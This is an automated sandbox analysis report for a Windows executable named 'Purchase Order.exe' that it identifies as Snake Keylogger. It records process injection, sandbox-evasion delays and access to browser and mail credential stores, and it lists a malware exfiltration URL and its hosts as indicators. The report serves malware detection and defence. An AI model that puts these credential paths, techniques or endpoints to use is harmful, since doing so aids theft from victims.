Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597170	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595986	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595425	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595182	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594072	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593905	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593797	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593563	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593438	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593313	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593203	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593094	Jump to behavior

Source: Purchase Order.exe, 00000003.00000002.4450874017.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Purchase Order.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Purchase Order.exe

Memory written: C:\Users\user\Desktop\Purchase Order.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.399bcb8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.397b498.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4454181362.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4454181362.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 1480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 6336, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Purchase Order.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Purchase Order.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.399bcb8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.397b498.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 1480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 6336, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.399bcb8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.397b498.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4454181362.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4454181362.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 1480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 6336, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Purchase Order.exe	21%	ReversingLabs	Win32.Trojan.Generic
Purchase Order.exe	30%	Virustotal		Browse
Purchase Order.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
reallyfreegeoip.org	1%	Virustotal	Browse
scratchdreams.tk	6%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
http://scratchdreams.tk	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/102.129.152.231$	0%	Avira URL Cloud	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/102.129.152.231	0%	Avira URL Cloud	safe
http://scratchdreams.tk	6%	Virustotal		Browse
https://scratchdreams.tk	15%	Virustotal		Browse
https://scratchdreams.tk/_send_.php?TS	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.199.224	true	false		high
reallyfreegeoip.org	172.67.177.134	true	false	1%, Virustotal, Browse	unknown
scratchdreams.tk	104.21.27.85	true	false	6%, Virustotal, Browse	unknown
checkip.dyndns.com	193.122.130.0	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://scratchdreams.tk/_send_.php?TS	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/102.129.152.231	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://us2.smtp.mailhostbox.com	Purchase Order.exe, 00000003.00000002.4454181362.00000000030C9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	Purchase Order.exe, 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://scratchdreams.tk	Purchase Order.exe, 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F55000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	Purchase Order.exe, 00000003.00000002.4454181362.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F55000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	Purchase Order.exe, 00000003.00000002.4454181362.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F55000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F55000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Purchase Order.exe, 00000003.00000002.4454181362.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/102.129.152.231$	Purchase Order.exe, 00000003.00000002.4454181362.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F55000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://scratchdreams.tk	Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/	Purchase Order.exe, 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
208.91.199.224	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
104.21.27.85	scratchdreams.tk	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1420090
Start date and time:	2024-04-04 12:55:24 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Purchase Order.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 127 Number of non-executed functions: 32
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Purchase Order.exe, PID 6336 because it is empty
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:56:07	API Interceptor	11426755x Sleep call for process: Purchase Order.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.122.130.0	iCareFone.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	Quark Browser.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	#U83e0#U841d#U5305#U8f7b#U5c0f#U8bf4 5.0.36.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	rTheRequestedReceipt.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Ship Particulars.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z16O865459999HY.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Details.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
208.91.199.224	Dhl 984857.exe	Get hash	malicious	AgentTesla	Browse
	Dhl 0393837.exe	Get hash	malicious	AgentTesla	Browse
	DHL Waybill & Shipping Documents.exe	Get hash	malicious	AgentTesla	Browse
	Quotation - HDPE Fittings.exe	Get hash	malicious	AgentTesla	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	DHL9407155789.exe	Get hash	malicious	AgentTesla	Browse
	FedEx Receipt_239017170.exe	Get hash	malicious	AgentTesla	Browse
	DHL9407155789.exe	Get hash	malicious	AgentTesla	Browse
	H760 MH POTENCIA SUPERIOR.exe	Get hash	malicious	AgentTesla	Browse
	Maersk Line Shipment DOC.exe	Get hash	malicious	AgentTesla	Browse
172.67.177.134	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse
	sipari#U015f formu_831512.exe	Get hash	malicious	Snake Keylogger	Browse
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse
	PROFORMA FATURA.exe	Get hash	malicious	Snake Keylogger	Browse
	xdd6BRIg0O.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
scratchdreams.tk	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.27.85
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
checkip.dyndns.com	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
	iCareFone.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.130.0
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.6.168
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.8.169
